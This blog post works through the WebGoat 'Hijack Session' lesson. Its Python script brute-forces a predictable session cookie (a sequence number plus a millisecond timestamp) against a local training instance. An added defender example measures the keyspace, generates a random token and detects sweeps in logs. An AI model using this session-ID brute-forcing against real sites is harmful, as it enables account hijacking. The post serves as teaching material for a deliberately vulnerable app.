Thursday, November 24, 2011

PoC fuzzer for weak session ID (WebGoat Hijack Session level)

The "Hijack Session" level in the Session Management Flaws category walks you through brute-forcing a weak, predictable session id that is built from two parts:
- a sequential number
- the issue time, in milliseconds


The first part of the solution uses WebScarab's session-ID analysis to find the missing sequence number and the time range in which it was issued. Once those are known, the session cookie is easy to crack; J-Baah is a Java tool that does this.
A simple Python script that does the same, brute-forcing the time part, could be:
```python
'''
Fuzzer for weak session ID (WebGoat Hijack Session level)
'''

import http.client  # Python 3 name of the httplib module

if __name__ == "__main__":
    # WebGoat instance reached on the local port 80
    httpServ = http.client.HTTPConnection("127.0.0.1", 80)
    httpServ.connect()

    # Sequence number 10991 and the timestamp prefix were recovered with
    # WebScarab; only the last three digits of the millisecond time are open.
    for wid in range(473, 582):
        weakid = "10991-1322155944%s" % wid
        body = "Username=Jack&Password=sniffy&WEAKID=%s&SUBMIT=Login" % weakid

        headers = {"Host": "localhost",
                   "Proxy-Connection": "keep-alive",
                   "Content-Length": str(len(body)),  # computed from the body, not hard-coded
                   "Cache-Control": "max-age=0",
                   "Origin": "http://localhost",
                   "User-Agent": "Fuzzy",
                   "Content-Type": "application/x-www-form-urlencoded",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                   "Referer": "http://localhost/WebGoat/attack?Screen=192&menu=1700",
                   "Accept-Encoding": "gzip,deflate,sdch",
                   "Accept-Language": "en-US,en;q=0.8",
                   "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3",
                   "Cookie": "JSESSIONID=E7F6B85DD9423511BF95E45B70332DAB; WEAKID=%s" % weakid,
                   "Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="}
        httpServ.request('POST',
                         '/WebGoat/attack?Screen=192&menu=1700',
                         body,
                         headers)

        response = httpServ.getresponse()
        print("weakid: ", weakid)
        print(response.read().decode("utf-8", errors="replace"))

        # Close after each attempt; request() reopens the connection on the next pass.
        httpServ.close()
```
 


(Adjust the missing sequential number, found through WebScarab's session analysis, and the time range to your own run.)
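An added example, not part of the original post, that turns the two points above into defender-side code: it quantifies how small the WEAKID search space described at the top really is (the sweep above covers 109 candidates), contrasts it with a randomly generated token, and flags the request pattern the script produces in web-server logs. The id format "sequence-milliseconds" follows the post; the log line format, the IP addresses, the `detect_weakid_bruteforce` threshold and the sample ids are constructed for illustration.

```python
"""
Added example (not from the original post): measure the WEAKID search space,
generate a strong replacement, and detect a WEAKID sweep in access logs.
The id format "<sequence>-<ms timestamp>" follows the post; the log format,
addresses, threshold and sample ids are constructed for illustration.
"""
import math
import re
import secrets
from collections import defaultdict

# "10991-1322155944473": sequence number, dash, 13-digit millisecond timestamp
WEAKID_RE = re.compile(r"^(\d+)-(\d{13})$")

# Constructed access-log shape: client ip ... "POST /WebGoat/attack..." ... cookie="WEAKID=..."
LOG_RE = re.compile(r'^(?P<ip>\S+) .*"POST /WebGoat/attack[^"]*".*WEAKID=(?P<weakid>\d+-\d+)')


def parse_weakid(weakid):
    """Split a WEAKID into (sequence number, timestamp in milliseconds)."""
    m = WEAKID_RE.match(weakid)
    if not m:
        raise ValueError("not a WEAKID: %r" % weakid)
    return int(m.group(1)), int(m.group(2))


def candidate_space(prev_id, next_id):
    """Number of candidates for the one id issued between two observed ids.

    The sequence number is known (it is the gap between the two), so only the
    millisecond timestamp strictly between the observed ones remains open.
    """
    seq_a, ts_a = parse_weakid(prev_id)
    seq_b, ts_b = parse_weakid(next_id)
    if seq_b - seq_a != 2:
        raise ValueError("expected exactly one missing sequence number")
    return ts_b - ts_a - 1


def keyspace_bits(candidates):
    """Work factor in bits: log2 of the number of candidates."""
    return math.log2(candidates)


def strong_session_id(nbytes=16):
    """128 random bits from the OS CSPRNG, URL-safe base64 without padding."""
    return secrets.token_urlsafe(nbytes)


def detect_weakid_bruteforce(log_lines, threshold=20):
    """Flag sources that POSTed many distinct WEAKIDs sharing one sequence number.

    A legitimate client presents one id per session; a sweep presents the same
    sequence number with many different timestamps. Returns {(ip, seq): count}.
    """
    stamps = defaultdict(lambda: defaultdict(set))
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        seq, ts = parse_weakid(m.group("weakid"))
        stamps[m.group("ip")][seq].add(ts)
    return {(ip, seq): len(seen)
            for ip, by_seq in stamps.items()
            for seq, seen in by_seq.items()
            if len(seen) >= threshold}


def constructed_log_lines():
    """Constructed sample: one source sweeping 109 timestamps, plus two normal requests."""
    fmt = ('%s - - [24/Nov/2011:18:12:31 +0000] "%s /WebGoat/attack?Screen=192&menu=1700 HTTP/1.1" '
           '200 4117 "-" "%s" cookie="%s"')
    lines = [fmt % ("10.0.0.5", "POST", "Fuzzy", "WEAKID=10991-%d" % ts)
             for ts in range(1322155944473, 1322155944582)]
    lines.append(fmt % ("10.0.0.7", "POST", "Mozilla/5.0", "WEAKID=10993-1322155950001"))
    lines.append(fmt % ("10.0.0.8", "GET", "Mozilla/5.0", "-"))
    return lines


if __name__ == "__main__":
    # Observed neighbours of the missing id (constructed to match the 473..581 sweep above)
    n = candidate_space("10990-1322155944472", "10992-1322155944582")
    print("candidates: %d (%.1f bits) vs 128 bits for %s" % (n, keyspace_bits(n), strong_session_id()))
    print(detect_weakid_bruteforce(constructed_log_lines()))
```

The work factor for the weak id comes out under 7 bits once two neighbouring ids have been observed, against 128 bits for the random token; the detector keys on the one property a sweep cannot hide, many distinct timestamps under a single sequence number from one source, and the threshold should be tuned to the traffic of the deployment.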